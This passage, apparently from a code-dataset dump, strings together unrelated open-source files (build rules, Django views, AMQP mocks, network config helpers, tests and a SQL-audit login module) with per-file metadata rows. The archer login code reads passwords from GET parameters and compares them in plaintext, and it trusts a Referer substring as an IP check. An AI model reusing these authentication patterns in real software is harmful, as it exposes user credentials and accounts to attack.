csharp_out = _camelize(base_name.split(".")[0]) + ".cs"
outdir = "$(GENDIR)"
native.genrule(
name = name,
srcs = deps + [
"@com_google_protobuf//:well_known_protos",
],
outs = [csharp_out],
cmd = """
mkdir -p {outdir}
$(location @com_google_protobuf//:protoc) \
--proto_path=. \
--proto_path={outdir} \
--proto_path=$$(pwd)/external/com_google_protobuf/src \
--proto_path=$$(pwd)/external/com_google_mediapipe \
--csharp_out={outdir} {}
mv {outdir}/{outfile} $$(dirname $(location {outfile}))
""".format(proto_src, outdir = outdir, outfile = csharp_out),
tools = [
"@com_google_protobuf//:protoc",
],
)
def _camelize(str):
res = ""
need_capitalize = True
for s in str.elems():
if not s.isalnum():
need_capitalize = True
continue
if need_capitalize:
res += s.capitalize()
else:
res += s
need_capitalize = s.isdigit()
return res
def _replace_suffix(string, old, new):
"""Returns a string with an old suffix replaced by a new suffix."""
return string.endswith(old) and string[:-len(old)] + new or string
| 26.208955 | 71 | 0.607062 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 912 | 0.519362 |
17e620adc33ee30cd11c65a57f46f1da7b3b9897 | 94 | py | Python | bertopic/__init__.py | louisguitton/BERTopic | 0b321678ffe4eab0a28484faf76728f584a94ebd | [
"MIT"
] | 1 | 2021-09-29T12:39:16.000Z | 2021-09-29T12:39:16.000Z | bertopic/__init__.py | louisguitton/BERTopic | 0b321678ffe4eab0a28484faf76728f584a94ebd | [
"MIT"
] | null | null | null | bertopic/__init__.py | louisguitton/BERTopic | 0b321678ffe4eab0a28484faf76728f584a94ebd | [
"MIT"
] | null | null | null | from bertopic._bertopic import BERTopic
__version__ = "0.9.1"
__all__ = [
"BERTopic",
]
| 11.75 | 39 | 0.680851 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 17 | 0.180851 |
17e90b462716e5227ea477b2107d03519822cef3 | 2,597 | py | Python | dailyfresh/df_goods/views.py | myworldhere/dailyfresh | 5c4e78095a08442feacce7038818f9978e1e0880 | [
"MIT"
] | null | null | null | dailyfresh/df_goods/views.py | myworldhere/dailyfresh | 5c4e78095a08442feacce7038818f9978e1e0880 | [
"MIT"
] | null | null | null | dailyfresh/df_goods/views.py | myworldhere/dailyfresh | 5c4e78095a08442feacce7038818f9978e1e0880 | [
"MIT"
] | null | null | null | # coding=utf-8
from django.shortcuts import render, redirect
from django.core.paginator import Paginator
from models import *
from haystack.views import SearchView
# Create your views here.
def index(request):
category_list = Category.objects.all()
array = []
for category in category_list:
news = category.goodsinfo_set.order_by('-id')[0:4]
hots = category.goodsinfo_set.order_by('-click')[0:4]
array.append({'news': news, 'hots': hots, 'category': category})
context = {'page_style': 'goods', 'title': '首页', 'array': array}
return render(request, 'df_goods/index.html', context)
def list(request, tid, index, sort):
category = Category.objects.get(id=tid)
# 新品推荐
news = category.goodsinfo_set.order_by('-id')[0:2]
if sort == '1': # 默认 上架时间排序
goods_list = GoodsInfo.objects.filter(category_id=int(tid)).order_by('-id')
elif sort == '2': # 价格排序
goods_list = GoodsInfo.objects.filter(category_id=int(tid)).order_by('-price')
elif sort == '3': # 人气,点击量排序
goods_list = GoodsInfo.objects.filter(category_id=int(tid)).order_by('-click')
paginator = Paginator(goods_list, 3)
page = paginator.page(int(index))
context = {
'title': category.title,
'page_style': 'goods',
'page': page,
'news': news,
'sort': sort,
'category': category,
'paginator': paginator,
'sort_title': ['默认', '价格', '人气']
}
return render(request, 'df_goods/list.html', context)
def detail(request, id):
goods = GoodsInfo.objects.get(id=id)
news = goods.category.goodsinfo_set.order_by('-id')[0:2]
goods.click = goods.click + 1
goods.save()
context = {'title': goods.category.title, 'page_style': 'goods', 'goods': goods, 'news': news}
response = render(request, 'df_goods/detail.html', context)
# 最近浏览记录
records = request.COOKIES.get('records', '')
if records != '':
records_array = records.split(',')
if records_array.count(id) >= 1: # 商品已记录则删除
records_array.remove(id)
records_array.insert(0, id) # 添加到首位
if len(records_array) > 5: # 记录个数超过5个,删除尾部元素
records_array.pop(5)
records = ','.join(records_array) # 拼接成字符串
else:
records = id
response.set_cookie('records', records)
return response
# 自己定全文检索上下文
class MySearchView(SearchView):
def extra_context(self):
context = super(MySearchView, self).extra_context()
context['title'] = '搜索'
context['page_style'] = 'goods'
return context
| 32.873418 | 98 | 0.628417 | 219 | 0.079262 | 0 | 0 | 0 | 0 | 0 | 0 | 661 | 0.239233 |
17e98bdd9410e5ff20a99bb45742f5cb653135df | 4,267 | py | Python | guillotina_amqp/tests/mocks.py | vjove/guillotina_amqp | 34f2011ea5547166211e90608c54657d93dde4fc | [
"BSD-3-Clause"
] | 4 | 2018-06-14T12:03:41.000Z | 2020-02-12T17:07:18.000Z | guillotina_amqp/tests/mocks.py | vjove/guillotina_amqp | 34f2011ea5547166211e90608c54657d93dde4fc | [
"BSD-3-Clause"
] | 45 | 2018-11-12T10:57:30.000Z | 2021-05-26T19:13:12.000Z | guillotina_amqp/tests/mocks.py | vjove/guillotina_amqp | 34f2011ea5547166211e90608c54657d93dde4fc | [
"BSD-3-Clause"
] | 4 | 2018-12-19T16:59:04.000Z | 2021-06-20T16:27:43.000Z | import asyncio
import uuid
class MockChannel:
def __init__(self):
self.published = []
self.acked = []
self.nacked = []
async def publish(self, *args, **kwargs):
self.published.append({"args": args, "kwargs": kwargs})
async def basic_client_ack(self, *args, **kwargs):
self.acked.append({"args": args, "kwargs": kwargs})
async def basic_client_nack(self, *args, **kwargs):
self.nacked.append({"args": args, "kwargs": kwargs})
class MockEnvelope:
def __init__(self, uid):
self.delivery_tag = uid
class MockAMQPChannel:
def __init__(self, protocol):
self.protocol = protocol
self.consumers = []
self.closed = False
self.unacked_messages = []
async def basic_qos(self, *args, **kwargs):
pass
async def exchange_declare(self, *args, **kwargs):
pass
async def queue_declare(self, queue_name, *args, **kwargs):
if queue_name not in self.protocol.queues:
self.protocol.queues[queue_name] = []
if "arguments" in kwargs:
arguments = kwargs["arguments"]
if "x-dead-letter-routing-key" in arguments:
self.protocol.dead_mapping[queue_name] = arguments[
"x-dead-letter-routing-key"
]
async def queue_bind(self, *args, **kwargs):
pass
async def _basic_consume(self, handler, queue_name):
while not self.closed:
await asyncio.sleep(0.02)
if queue_name not in self.protocol.queues:
continue
else:
messages = self.protocol.queues[queue_name]
self.protocol.queues[queue_name] = []
self.unacked_messages.extend(messages)
for message in messages:
await handler(
self,
message["message"],
MockEnvelope(message["id"]),
message["properties"],
)
async def basic_client_ack(self, delivery_tag):
for message in self.unacked_messages[:]:
if delivery_tag == message["id"]:
self.unacked_messages.remove(message)
return message
async def basic_client_nack(self, delivery_tag, multiple=False, requeue=False):
message = await self.basic_client_ack(delivery_tag)
if message:
if requeue:
# put back on same queue
self.protocol.queues[message["queue"]].append(message)
else:
new_queue = self.protocol.dead_mapping[message["queue"]]
self.protocol.queues[new_queue].append(message)
async def basic_consume(self, handler, queue_name):
self.consumers.append(
asyncio.ensure_future(self._basic_consume(handler, queue_name))
)
async def publish(
self, message, exchange_name=None, routing_key=None, properties={}
):
if routing_key not in self.protocol.queues:
self.protocol.queues[routing_key] = []
self.protocol.queues[routing_key].append(
{
"id": str(uuid.uuid4()),
"message": message,
"properties": properties,
"queue": routing_key,
}
)
async def close(self):
self.closed = True
await asyncio.sleep(0.06)
class MockAMQPTransport:
def __init__(self):
pass
def close(self):
pass
class MockAMQPProtocol:
def __init__(self):
self.queues = {}
self.dead_mapping = {}
self.closed = False
self.channels = []
async def channel(self):
channel = MockAMQPChannel(self)
self.channels.append(channel)
return channel
async def wait_closed(self):
while not self.closed:
await asyncio.sleep(0.05)
raise GeneratorExit()
async def close(self):
self.closed = True
for channel in self.channels:
await channel.close()
async def send_heartbeat(self):
pass
async def amqp_connection_factory(*args, **kwargs):
return MockAMQPTransport(), MockAMQPProtocol()
| 29.427586 | 83 | 0.574408 | 4,120 | 0.96555 | 0 | 0 | 0 | 0 | 3,487 | 0.817202 | 217 | 0.050855 |
17ea30689ba9d98fd7b8fd672edbe09e38e06775 | 210 | py | Python | foodbot/urls.py | surajpaib/HungerHero | be7c0b77944579f057886b074ba8db83d270ae83 | [
"Apache-2.0"
] | null | null | null | foodbot/urls.py | surajpaib/HungerHero | be7c0b77944579f057886b074ba8db83d270ae83 | [
"Apache-2.0"
] | null | null | null | foodbot/urls.py | surajpaib/HungerHero | be7c0b77944579f057886b074ba8db83d270ae83 | [
"Apache-2.0"
] | null | null | null | from django.conf.urls import url
from . import views
urlpatterns = [
url(r'^bot/', views.webhook, name='bot'),
url(r'^foodcenter/', views.food_center_webhook, name= 'food'),
# url(r'^relay/', vi)
] | 26.25 | 66 | 0.647619 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 55 | 0.261905 |
17ea8bf7616bc3b308a3396c07848b28c8a67621 | 3,874 | py | Python | pkgs/sdk-pkg/src/genie/libs/sdk/apis/iosxe/l2vpn/configure.py | CiscoTestAutomation/genielibs | becee8a1a85f4973e00859e3244e2c8fe45a394c | [
"Apache-2.0"
] | 94 | 2018-04-30T20:29:15.000Z | 2022-03-29T13:40:31.000Z | pkgs/sdk-pkg/src/genie/libs/sdk/apis/iosxe/l2vpn/configure.py | patrickboertje/genielibs | 61c37aacf3dd0f499944555e4ff940f92f53dacb | [
"Apache-2.0"
] | 67 | 2018-12-06T21:08:09.000Z | 2022-03-29T18:00:46.000Z | pkgs/sdk-pkg/src/genie/libs/sdk/apis/iosxe/l2vpn/configure.py | patrickboertje/genielibs | 61c37aacf3dd0f499944555e4ff940f92f53dacb | [
"Apache-2.0"
] | 49 | 2018-06-29T18:59:03.000Z | 2022-03-10T02:07:59.000Z | """Common configure functions for bgp"""
# Python
import logging
import re
# Unicon
from unicon.core.errors import SubCommandFailure
log = logging.getLogger(__name__)
def configure_l2vpn_storm_control(
device, interface, service_instance_id, storm_control
):
""" Configures storm control under service instance
Args:
device('obj'): device to configure
interface('str'): interface name
service_instance_id:('int'): service instance id
storm_control('list'): list of storm control configurations
ex.)
[
{
'traffic_flow': 'unicast',
'name': 'cir',
'val': 8000
},
{
'traffic_flow': 'broadcast',
'name': 'cir',
'val': 8000
},
{
'traffic_flow': 'multicast',
'name': 'cir',
'val': 8000
}
]
Returns:
N/A
Raises:
SubCommandFailure
"""
log.info(
"Configuring storm control under service "
"instance: {} and interface: {}".format(service_instance_id, interface)
)
config = []
config.append("interface {}\n".format(interface))
config.append("service instance {} ethernet\n".format(service_instance_id))
for sc in storm_control:
traffic_flow = sc["traffic_flow"]
name = sc["name"]
val = sc["val"]
config.append(
"storm-control {} {} {}\n".format(traffic_flow, name, val)
)
try:
device.configure("".join(config))
except SubCommandFailure as e:
raise SubCommandFailure(
"Configuration failed for storm control under service "
"instance: {} and interface: {} with exception: {}".format(
service_instance_id, interface, str(e)
)
)
def configure_l2vpn_vfi_context_vpls(device, vpn_id, pseudowire=None):
"""
Configures l2vpn vfi context vpls on device
Args:
device('obj'): device to configure
vpn_id('str'): vpn_id to configure
pseudowire('str', optional): pseudowire to configure,
default value is None
Returns:
N/A
Raises:
SubCommandFailure
"""
log.info(
"Configuring l2vpn vfi context vpls on {dev}".format(dev=device.name)
)
config = [
"l2vpn vfi context vpls",
"vpn id {vpn}".format(vpn=vpn_id)
]
if pseudowire:
for attr in pseudowire:
config.append("member {attr}".format(attr=attr))
try:
device.configure(config)
except SubCommandFailure as e:
raise SubCommandFailure(
"Configuration failed for l2vpn vfi vpls on "
"{dev} with exception: {e}".format(
dev=device.name, e=str(e)
)
)
def unconfigure_l2vpn_vfi_context_vpls(device):
"""
Unconfigures l2vpn vfi context vpls on device
Args:
device('obj'): device to configure
Returns:
N/A
Raises:
SubCommandFailure
"""
log.info(
"Unconfiguring l2vpn vfi context vpls on {dev}".format(dev=device.name)
)
try:
device.configure("no l2vpn vfi context vpls")
except SubCommandFailure as e:
raise SubCommandFailure(
"Configuration removal failed for l2vpn vfi vpls on "
"{dev} with exception: {e}".format(
dev=device.name, e=str(e)
)
)
| 28.485294 | 79 | 0.513681 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2,270 | 0.585958 |
17ecb3cdae4406d81c58cf487da09197d576b8b9 | 590 | py | Python | MagiSlack/__main__.py | riemannulus/MagiSlack | 3bcb5057ccc0699b2e4b0029f5d1c87e03a70356 | [
"MIT"
] | null | null | null | MagiSlack/__main__.py | riemannulus/MagiSlack | 3bcb5057ccc0699b2e4b0029f5d1c87e03a70356 | [
"MIT"
] | null | null | null | MagiSlack/__main__.py | riemannulus/MagiSlack | 3bcb5057ccc0699b2e4b0029f5d1c87e03a70356 | [
"MIT"
] | null | null | null | from os import environ
from MagiSlack.io import MagiIO
from MagiSlack.module import MagiModule
def hello_world(*args, **kwargs):
return f"HELLO WORLD! user {kwargs['name']}, {kwargs['display_name']}"
if __name__ == '__main__':
print('Magi Start!')
print('='*30)
print('MagiModule Initializing.')
module = MagiModule.MagiModule(environ['SLACK_API_TOKEN'])
print('Complete')
print('='*30)
print('MagiIO Initializing.')
io = MagiIO.MagiIO(module)
print('Complete')
print('='*30)
io.set_callback_func('hello', hello_world)
io.start()
| 21.851852 | 74 | 0.666102 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 187 | 0.316949 |
17edcea77994ad95b7f15708cbc1815c28e54b7c | 2,234 | py | Python | my_plugins/YouCompleteMe/third_party/ycmd/ycmd/tests/server_utils_test.py | liutongliang/myVim | 6c7ab36f25f4a5e2e1daeab8c43509975eb031e3 | [
"MIT"
] | 2 | 2018-04-16T03:08:42.000Z | 2021-01-06T10:21:49.000Z | my_plugins/YouCompleteMe/third_party/ycmd/ycmd/tests/server_utils_test.py | liutongliang/myVim | 6c7ab36f25f4a5e2e1daeab8c43509975eb031e3 | [
"MIT"
] | null | null | null | my_plugins/YouCompleteMe/third_party/ycmd/ycmd/tests/server_utils_test.py | liutongliang/myVim | 6c7ab36f25f4a5e2e1daeab8c43509975eb031e3 | [
"MIT"
] | null | null | null | # Copyright (C) 2016-2018 ycmd contributors
#
# This file is part of ycmd.
#
# ycmd is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# ycmd is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with ycmd. If not, see <http://www.gnu.org/licenses/>.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import absolute_import
# Not installing aliases from python-future; it's unreliable and slow.
from builtins import * # noqa
from hamcrest import assert_that, calling, equal_to, raises
from mock import patch
from ycmd.server_utils import GetStandardLibraryIndexInSysPath
from ycmd.tests import PathToTestFile
@patch( 'sys.path', [
PathToTestFile( 'python-future', 'some', 'path' ),
PathToTestFile( 'python-future', 'another', 'path' ) ] )
def GetStandardLibraryIndexInSysPath_ErrorIfNoStandardLibrary_test( *args ):
assert_that(
calling( GetStandardLibraryIndexInSysPath ),
raises( RuntimeError,
'Could not find standard library path in Python path.' ) )
@patch( 'sys.path', [
PathToTestFile( 'python-future', 'some', 'path' ),
PathToTestFile( 'python-future', 'standard_library' ),
PathToTestFile( 'python-future', 'another', 'path' ) ] )
def GetStandardLibraryIndexInSysPath_FindFullStandardLibrary_test( *args ):
assert_that( GetStandardLibraryIndexInSysPath(), equal_to( 1 ) )
@patch( 'sys.path', [
PathToTestFile( 'python-future', 'some', 'path' ),
PathToTestFile( 'python-future', 'embedded_standard_library',
'python35.zip' ),
PathToTestFile( 'python-future', 'another', 'path' ) ] )
def GetStandardLibraryIndexInSysPath_FindEmbeddedStandardLibrary_test( *args ):
assert_that( GetStandardLibraryIndexInSysPath(), equal_to( 1 ) )
| 39.192982 | 79 | 0.745748 | 0 | 0 | 0 | 0 | 1,101 | 0.492838 | 0 | 0 | 1,091 | 0.488362 |
17ee2ab39fa3aef85b71231efdccae35147bec91 | 560 | py | Python | spraycharles/utils/notify.py | Tw1sm/passwordpredator | 57e173c68b1dfe89149fc108999f560bf1569cd7 | [
"BSD-3-Clause"
] | null | null | null | spraycharles/utils/notify.py | Tw1sm/passwordpredator | 57e173c68b1dfe89149fc108999f560bf1569cd7 | [
"BSD-3-Clause"
] | null | null | null | spraycharles/utils/notify.py | Tw1sm/passwordpredator | 57e173c68b1dfe89149fc108999f560bf1569cd7 | [
"BSD-3-Clause"
] | null | null | null | import pymsteams
from discord_webhook import DiscordWebhook
from notifiers import get_notifier
def slack(webhook, host):
slack = get_notifier("slack")
slack.notify(message=f"Credentials guessed for host: {host}", webhook_url=webhook)
def teams(webhook, host):
notify = pymsteams.connectorcard(webhook)
notify.text(f"Credentials guessed for host: {host}")
notify.send()
def discord(webhook, host):
notify = DiscordWebhook(
url=webhook, content=f"Credentials guessed for host: {host}"
)
response = webhook.execute()
| 25.454545 | 86 | 0.725 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 124 | 0.221429 |
17ef674eddb0b6d4127cc6eda09e667c21a0faed | 716 | py | Python | manage.py | SinnerSchraderMobileMirrors/django-cms | 157daefd30d9e82cc538a0c226539bf6681beabd | [
"BSD-3-Clause"
] | 2 | 2018-05-17T02:49:49.000Z | 2019-08-20T02:07:44.000Z | manage.py | SinnerSchraderMobileMirrors/django-cms | 157daefd30d9e82cc538a0c226539bf6681beabd | [
"BSD-3-Clause"
] | 2 | 2019-02-13T07:58:23.000Z | 2019-02-13T07:58:27.000Z | manage.py | SinnerSchraderMobileMirrors/django-cms | 157daefd30d9e82cc538a0c226539bf6681beabd | [
"BSD-3-Clause"
] | null | null | null | #!/usr/bin/env python
import sys
from cms.test_utils.cli import configure
from cms.test_utils.tmpdir import temp_dir
import os
def main():
with temp_dir() as STATIC_ROOT:
with temp_dir() as MEDIA_ROOT:
configure(
'sqlite://localhost/cmstestdb.sqlite',
ROOT_URLCONF='cms.test_utils.project.urls',
STATIC_ROOT=STATIC_ROOT,
MEDIA_ROOT=MEDIA_ROOT,
)
from django.core.management import execute_from_command_line
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "cms.test_utils.cli")
execute_from_command_line(sys.argv)
if __name__ == '__main__':
main()# -*- coding: utf-8 -*-
| 27.538462 | 81 | 0.632682 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 164 | 0.22905 |
17f2ae7ec4594fe359f3c7b237e6c438d1daf8c2 | 2,639 | py | Python | semantic-clustering/semantic_clustering/EmbeddingDataFrameWrapper.py | zzoia/sbert_wk_sentence_embedder | 096b149eefec25fac83aaef674421dfdfb150a68 | [
"MIT"
] | null | null | null | semantic-clustering/semantic_clustering/EmbeddingDataFrameWrapper.py | zzoia/sbert_wk_sentence_embedder | 096b149eefec25fac83aaef674421dfdfb150a68 | [
"MIT"
] | null | null | null | semantic-clustering/semantic_clustering/EmbeddingDataFrameWrapper.py | zzoia/sbert_wk_sentence_embedder | 096b149eefec25fac83aaef674421dfdfb150a68 | [
"MIT"
] | null | null | null | import numpy as np
import pandas as pd
from sklearn.metrics.pairwise import cosine_similarity
class EmbeddingDataFrameWrapper:
def __init__(self, path_to_csv, embedder=None, text_column="text", pooling="embedding", print_results=True):
self.embed_df = pd.read_pickle(path_to_csv)
self.embedder = embedder
self.text_column = text_column
self.pooling = pooling
self.print_results = print_results
def search(self, query, top_n=None, threshold=None):
if isinstance(query, str):
query_embedding = self.embedder(query)
elif isinstance(query, int):
query_embedding = self.__get_embedding_by_index(query)
else:
query_embedding = query
index, text, cosine = self.__get_top_similar(query_embedding, top_n, threshold)
if self.print_results:
self.__print_similar(zip(index, text, cosine))
return index, text, cosine
def get_random_sample(self):
rnd = self.embed_df.sample(1)
return (rnd.index[0], rnd[self.text_column].values[0])
def get_text_by_index(self, index):
return self.embed_df[self.embed_df.index == index][self.text_column].values[0]
def __get_embedding_by_index(self, index):
df = self.embed_df[self.embed_df.index == index]
if isinstance(self.pooling, str):
series = df[self.pooling]
elif callable(self.pooling):
series = df.apply(self.pooling, axis=1)
else:
raise Exception("No pooling strategy provided")
return series.values[0]
def __pool(self):
if isinstance(self.pooling, str):
series = self.embed_df[self.pooling]
elif callable(self.pooling):
series = self.embed_df.apply(self.pooling, axis=1)
else:
raise Exception("No pooling strategy provided")
return series.values.tolist()
def __get_top_similar(self, query, top_n, threshold):
similarity = cosine_similarity([query], self.__pool())
similarity = np.squeeze(similarity)
indices = np.argsort(similarity)[::-1]
if threshold:
indices = indices[:np.sum(similarity > threshold)]
if top_n:
indices = indices[:top_n+1]
texts = self.embed_df.iloc[indices][self.text_column].values
return self.embed_df.iloc[indices].index.values, texts, similarity[indices]
def __print_similar(self, similar):
for index, result, cosine in similar:
str_format = "[{:<7} ({:.2f})] - {}"
print(str_format.format(f"#{index}", cosine, result)) | 37.169014 | 112 | 0.643047 | 2,544 | 0.964002 | 0 | 0 | 0 | 0 | 0 | 0 | 111 | 0.042061 |
17f3838494cef3ff36c0edabf5b3161b2c576936 | 1,716 | py | Python | sawyer/flat_goal_env.py | geyang/gym-sawyer | c6e81ab4faefafcfa3886d74672976cc16452747 | [
"MIT"
] | 4 | 2020-06-02T16:25:31.000Z | 2020-07-28T12:26:26.000Z | sawyer/flat_goal_env.py | geyang/gym-sawyer | c6e81ab4faefafcfa3886d74672976cc16452747 | [
"MIT"
] | 1 | 2020-09-30T10:24:04.000Z | 2020-09-30T10:24:04.000Z | sawyer/flat_goal_env.py | geyang/gym-sawyer | c6e81ab4faefafcfa3886d74672976cc16452747 | [
"MIT"
] | null | null | null | import gym
import numpy as np
# wrapper classes are anti-patterns.
def FlatGoalEnv(env, obs_keys, goal_keys):
"""
We require the keys to be passed in explicitly, to avoid mistakes.
:param env:
:param obs_keys: obs_keys=('state_observation',)
:param goal_keys: goal_keys=('desired_goal',)
"""
goal_keys = goal_keys or []
for k in obs_keys:
assert k in env.observation_space.spaces
for k in goal_keys:
assert k in env.observation_space.spaces
assert isinstance(env.observation_space, gym.spaces.Dict)
_observation_space = env.observation_space
_step = env.step
_reset = env.reset
# TODO: handle nested dict
env._observation_space = _observation_space
env.observation_space = gym.spaces.Box(
np.hstack([_observation_space.spaces[k].low for k in obs_keys]),
np.hstack([_observation_space.spaces[k].high for k in obs_keys]),
)
if len(goal_keys) > 0:
env.goal_space = gym.spaces.Box(
np.hstack([_observation_space.spaces[k].low for k in goal_keys]),
np.hstack([_observation_space.spaces[k].high for k in goal_keys]),
)
# _goal = None
def step(action):
nonlocal obs_keys
obs, reward, done, info = _step(action)
flat_obs = np.hstack([obs[k] for k in obs_keys])
return flat_obs, reward, done, info
def reset():
nonlocal goal_keys
obs = _reset()
# if len(goal_keys) > 0:
# _goal = np.hstack([obs[k] for k in goal_keys])
return np.hstack([obs[k] for k in obs_keys])
# def get_goal(self):
# return _goal
env.step = step
env.reset = reset
return env
| 27.238095 | 78 | 0.634033 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 393 | 0.229021 |
17f39ca5f51dfeded3449260d86659beaadb7c0a | 23,967 | py | Python | sql/views_ajax.py | Galo1117/archer | a0e32b8990cdbbe4a7166656762fbf0f694092fa | [
"Apache-2.0"
] | null | null | null | sql/views_ajax.py | Galo1117/archer | a0e32b8990cdbbe4a7166656762fbf0f694092fa | [
"Apache-2.0"
] | null | null | null | sql/views_ajax.py | Galo1117/archer | a0e32b8990cdbbe4a7166656762fbf0f694092fa | [
"Apache-2.0"
] | null | null | null | # -*- coding: UTF-8 -*-
import re
import simplejson as json
import datetime
import multiprocessing
import urllib.parse
import subprocess
from django.contrib.auth import authenticate, login
from django.db.models import Q
from django.db import transaction
from django.conf import settings
from django.views.decorators.csrf import csrf_exempt
from django.shortcuts import render, get_object_or_404
from django.http import HttpResponse, HttpResponseRedirect
from django.contrib.auth.decorators import login_required
from django.contrib.auth.hashers import check_password, make_password
from sql.permission import superuser_required
if settings.ENABLE_LDAP:
from django_auth_ldap.backend import LDAPBackend
from django.core import serializers
from .dao import Dao
from .const import Const, WorkflowDict
from .inception import InceptionDao
from .projectresource import PermissionVerification
from .aes_decryptor import Prpcrypt
from .models import users, master_config, workflow, Group
from sql.sendmail import MailSender
import logging
from .workflow import Workflow
from .extend_json_encoder import ExtendJSONEncoder
logger = logging.getLogger('default')
mailSender = MailSender()
dao = Dao()
inceptionDao = InceptionDao()
prpCryptor = Prpcrypt()
login_failure_counter = {} # 登录失败锁定计数器,给loginAuthenticate用的
sqlSHA1_cache = {} # 存储SQL文本与SHA1值的对应关系,尽量减少与数据库的交互次数,提高效率。格式: {工单ID1:{SQL内容1:sqlSHA1值1, SQL内容2:sqlSHA1值2},}
workflowOb = Workflow()
# 登录失败通知
def log_mail_record(login_failed_message):
mail_title = 'login inception'
logger.warning(login_failed_message)
if getattr(settings, 'MAIL_ON_OFF'):
mailSender.sendEmail(mail_title, login_failed_message, getattr(settings, 'MAIL_REVIEW_SECURE_ADDR'))
# ajax接口,登录页面调用,用来验证用户名密码
@csrf_exempt
def loginAuthenticate(username, password):
"""登录认证,包含一个登录失败计数器,5分钟内连续失败5次的账号,会被锁定5分钟"""
lockCntThreshold = settings.LOCK_CNT_THRESHOLD
lockTimeThreshold = settings.LOCK_TIME_THRESHOLD
# 服务端二次验证参数
if username == "" or password == "" or username is None or password is None:
result = {'status': 2, 'msg': '登录用户名或密码为空,请重新输入!', 'data': ''}
elif username in login_failure_counter and login_failure_counter[username]["cnt"] >= lockCntThreshold and (
datetime.datetime.now() - login_failure_counter[username][
"last_failure_time"]).seconds <= lockTimeThreshold:
log_mail_record('user:{},login failed, account locking...'.format(username))
result = {'status': 3, 'msg': '登录失败超过5次,该账号已被锁定5分钟!', 'data': ''}
else:
# 登录
user = authenticate(username=username, password=password)
# 登录成功
if user:
# 如果登录失败计数器中存在该用户名,则清除之
if username in login_failure_counter:
login_failure_counter.pop(username)
result = {'status': 0, 'msg': 'ok', 'data': user}
# 登录失败
else:
if username not in login_failure_counter:
# 第一次登录失败,登录失败计数器中不存在该用户,则创建一个该用户的计数器
login_failure_counter[username] = {"cnt": 1, "last_failure_time": datetime.datetime.now()}
else:
if (datetime.datetime.now() - login_failure_counter[username][
"last_failure_time"]).seconds <= lockTimeThreshold:
login_failure_counter[username]["cnt"] += 1
else:
# 上一次登录失败时间早于5分钟前,则重新计数。以达到超过5分钟自动解锁的目的。
login_failure_counter[username]["cnt"] = 1
login_failure_counter[username]["last_failure_time"] = datetime.datetime.now()
log_mail_record(
'user:{},login failed, fail count:{}'.format(username, login_failure_counter[username]["cnt"]))
result = {'status': 1, 'msg': '用户名或密码错误,请重新输入!', 'data': ''}
return result
# ajax接口,登录页面调用,用来验证用户名密码
@csrf_exempt
def authenticateEntry(request):
"""接收http请求,然后把请求中的用户名密码传给loginAuthenticate去验证"""
username = request.POST.get('username')
password = request.POST.get('password')
result = loginAuthenticate(username, password)
if result['status'] == 0:
user = result.get('data')
# 开启LDAP的认证通过后更新用户密码
if settings.ENABLE_LDAP:
try:
users.objects.get(username=username)
except Exception:
insert_info = users()
insert_info.password = make_password(password)
insert_info.save()
else:
replace_info = users.objects.get(username=username)
replace_info.password = make_password(password)
replace_info.save()
# 调用了django内置登录方法,防止管理后台二次登录
user = authenticate(username=username, password=password)
if user:
login(request, user)
# session保存用户信息
request.session['login_username'] = username
result = {'status': 0, 'msg': 'ok', 'data': None}
return HttpResponse(json.dumps(result), content_type='application/json')
#ITOM用户认证接口,用来验证用户名密码
@csrf_exempt
def authenticateEntryITOM(request):
"""接收ITOM验证请求,然后把请求中的用户名密码传给loginAuthenticate去验证"""
# if request.META.has_key('HTTP_X_FORWARDED_FOR'):
# ip = request.META['HTTP_X_FORWARDED_FOR']
# else:
# ip = request.META['REMOTE_ADDR']
try:
ip = urllib.parse.urlparse(request.META.get("HTTP_REFERER", None)).netloc
# ip = re.findall(r'\d+.\d+.\d+.\d+', request.META.get("HTTP_REFERER",None))
except Exception as e:
ip = "NULL"
result = {'status': 4, 'msg': u'IP鉴权失败,非信任IP!', 'data': ''}
strUsername = request.GET.get('username')
strPassword = request.GET.get('password')
sessionExpiry = settings.SESSION_EXPIRY
if strUsername == "" or strPassword == "" or strUsername is None or strPassword is None:
result = {'status':2, 'msg':u'登录用户名或密码为空,请重新输入!', 'data':''}
elif settings.ITOM_HOST not in ip:
result = {'status': 4, 'msg': u'IP鉴权失败,非信任IP!', 'data': ''}
else:
correct_users = users.objects.filter(username=strUsername)
if len(correct_users) == 1 and correct_users[0].is_active and strPassword == correct_users[0].password:
result = {'status':0, 'msg':'ok', 'data':''}
else:
result = {'status':1, 'msg':u'用户名或密码错误,请重新输入!', 'data':''}
if result['status'] == 0:
request.session['login_username'] = strUsername
request.session.set_expiry(sessionExpiry)
return HttpResponseRedirect('/sqlquery/')
else:
return HttpResponse(result['msg'])
return HttpResponse(json.dumps(result), content_type='application/json')
# 获取审核列表
@csrf_exempt
def sqlworkflow(request):
# 获取用户信息
loginUser = request.session.get('login_username', False)
limit = int(request.POST.get('limit'))
offset = int(request.POST.get('offset'))
limit = offset + limit
# 获取搜索参数
search = request.POST.get('search')
if search is None:
search = ''
# 获取筛选参数
navStatus = request.POST.get('navStatus')
# 管理员可以看到全部工单,其他人能看到自己提交和审核的工单
loginUserOb = users.objects.get(username=loginUser)
# 全部工单里面包含搜索条件
if navStatus == 'all':
if loginUserOb.is_superuser == 1 or loginUserOb.role == "DBA":
listWorkflow = workflow.objects.filter(
Q(engineer__contains=search) | Q(workflow_name__contains=search)
).order_by('-create_time')[offset:limit].values("id", "workflow_name", "engineer", "status",
"is_backup", "create_time", "cluster_name", "db_name",
"group_name")
listWorkflowCount = workflow.objects.filter(
